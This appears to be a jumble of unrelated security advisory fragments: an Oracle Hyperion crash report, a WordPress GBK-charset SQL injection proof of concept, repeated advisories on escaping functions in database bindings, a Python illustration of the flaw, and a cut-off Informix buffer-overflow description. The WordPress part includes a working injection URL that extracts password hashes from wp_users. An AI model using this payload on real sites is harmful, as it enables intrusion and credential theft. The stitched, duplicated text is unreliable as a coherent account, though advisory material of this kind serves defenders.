which is delivered with Oracle Hyperion Suite.
When clicked, a login box appears; on clicking OK an error message
also appears, then an error, then... boom!
description for .oce :
Interactive Reporting database connection file
file association:
"C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe" "%1"
crash dump, eip and seh overwritten, unicode expanded,
3. Proof of concept
a. After WordPress installation, modify wp-config.php to make sure
it uses certain character set for database connection (Big5 can also be used):
define('DB_CHARSET', 'GBK');
b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23
It was discovered that postgresql-ocaml, OCaml bindings to PostgreSQL's
libpq, was missing a function to call PQescapeStringConn(). This is
needed, because PQescapeStringConn() honours the charset of the
connection and prevents insufficient escaping, when certain multibyte
character encodings are used. The added function is called
escape_string_conn() and takes the established database connection as a
first argument. The old escape_string() was kept for backwards
compatibility.
Developers using these bindings are encouraged to adjust their code to
use the new function.
It was discovered that mysql-ocaml, OCaml bindings for MySQL,
was missing a function to call mysql_real_escape_string(). This
is needed, because mysql_real_escape_string() honours the charset
of the connection and prevents insufficient escaping, when certain
multibyte character encodings are used. The added function is called
real_escape() and takes the established database connection as a first
argument. The old escape_string() was kept for backwards compatibility
(CVE-2009-2942).
This update fixes this vulnerability.
_______________________________________________________________________
It was discovered that pygresql, a PostgreSQL module for Python, was
missing a function to call PQescapeStringConn(). This is needed, because
PQescapeStringConn() honours the charset of the connection and prevents
insufficient escaping, when certain multibyte character encodings are
used. The new function is called pg_escape_string(), which takes the
database connection as a first argument. The old function
escape_string() has been preserved as well for backwards compatibility.
Developers using these bindings are encouraged to adjust their code to
use the new function.
It was discovered that mysql-ocaml, OCaml bindings for MySQL, was
missing a function to call mysql_real_escape_string(). This is needed,
because mysql_real_escape_string() honours the charset of the connection
and prevents insufficient escaping, when certain multibyte character
encodings are used. The added function is called real_escape() and
takes the established database connection as a first argument. The old
escape_string() was kept for backwards compatibility.
Developers using these bindings are encouraged to adjust their code to
use the new function.
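The charset problem these advisories describe, as an added Python example (not code from any of the advisories or bindings): byte-wise escaping is compared with a simplified model of connection-aware escaping on the two bytes `%b3%27` from the proof of concept above. The function names and the sample `中'` are constructed for illustration.

```python
# Added illustration; function names are hypothetical, not from any binding.
SPECIAL = b"\\'\"\x00"

def naive_escape(raw: bytes) -> bytes:
    """Charset-unaware escaping: backslash-prefix special bytes one at a time."""
    out = bytearray()
    for b in raw:
        if b in SPECIAL:
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def conn_aware_escape(raw: bytes, charset: str) -> bytes:
    """Simplified model of connection-aware escaping: decode first so the
    escaper sees whole characters. Malformed input raises UnicodeDecodeError."""
    text = raw.decode(charset)  # strict decoding rejects broken sequences
    escaped = "".join("\\" + ch if ch in "\\'\"\x00" else ch for ch in text)
    return escaped.encode(charset)

def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count quotes a server parsing in `charset` would treat as terminators."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":   # backslash escapes the following character
            i += 2
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count

SAMPLE = b"\xb3'"             # the bytes %b3%27 from the proof of concept
VALID = "中'".encode("gbk")   # constructed, well-formed GBK input

if __name__ == "__main__":
    escaped = naive_escape(SAMPLE)
    # Under GBK the added 0x5C becomes the trail byte of 0xB3, freeing the quote.
    print(escaped, unescaped_quotes(escaped, "gbk"), unescaped_quotes(escaped, "latin-1"))
    print(unescaped_quotes(conn_aware_escape(VALID, "gbk"), "gbk"))
    try:
        conn_aware_escape(SAMPLE, "gbk")
    except UnicodeDecodeError as exc:
        print("rejected:", exc.reason)
```

The same escaped bytes are safe under a single-byte charset and unsafe under GBK, which is why the escaping function needs the connection as an argument.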
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
systems with vulnerable installations of IBM's Informix Dynamic Server.
User interaction is not required to exploit this vulnerability.
Authentication is required in that an attacker must have database
connection privileges.
The specific flaw exists in the oninit.exe process that listens by
default on TCP port 1526. During authentication, the process does not
validate the length of the DBPATH variable. An attacker can provide an
overly long variable name and overflow a global buffer, overwriting